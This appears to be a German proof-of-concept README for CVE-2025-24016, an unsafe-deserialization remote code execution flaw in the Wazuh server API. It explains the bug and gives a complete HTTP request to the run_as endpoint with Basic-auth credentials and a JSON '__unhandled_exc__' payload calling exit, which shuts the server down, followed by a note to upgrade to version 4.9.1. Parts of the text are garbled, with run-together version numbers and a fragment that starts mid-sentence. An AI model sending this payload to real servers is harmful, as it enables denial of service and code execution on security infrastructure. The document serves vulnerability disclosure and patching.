
CVE-2025-24016: RCE im Wazuh-Server! Remote-Codeausführung
Dieses Repository demonstriert die Schwachstelle zur Ausführung von entferntem Code (RCE) im Wazuh-Server, die durch eine unsichere Deserialisierung im wazuh-manager-Paket eingeführt wurde. Die Schwachstelle ermöglicht es entfernten Angreifern mit API-Zugriff (kompromittiertes Dashboard, Wazuh-Server im Cluster oder bestimmte Konfigurationen mit kompromittierten Agents), beliebigen Code auf dem Server auszuführen.
wazuh-manager Version >= 4.4.0>= 4.9.1Die Schwachstelle tritt in der Wazuh-API auf, wo Parameter im DistributedAPI als JSON serialisiert und mit as_wazuh_object in der Datei framework/wazuh/core/cluster/common.py deserialisiert werden. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er ein unsanitized Dictionary in DAPI-Anfragen injiziert, was zur Auswertung von beliebigem Python-Code führen kann.
Das RCE kann über den run_as-Endpunkt ausgelöst werden, der es dem Angreifer ermöglicht, das auth_context-Argument zu kontrollieren. Durch das Erstellen einer böswilligen Anfrage kann beliebiger Code auf dem Master-Server ausgeführt werden.
Um diese Schwachstelle über die Server-API auszulösen, befolgen Sie die untenstehenden Schritte.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__, die die Ausführung von beliebigem Python-Code auslöst (hier exit).>= 4.4.0 bis 4.9.0 (noch nicht gepatcht).exit-Funktion ausgelöst, die zum Herunterfahren des Wazuh-Servers führt.Um Ihre Systeme zu schützen, aktualisieren Sie auf Wazuh Version >= 4.9.1, in der dieses Problem behoben ist.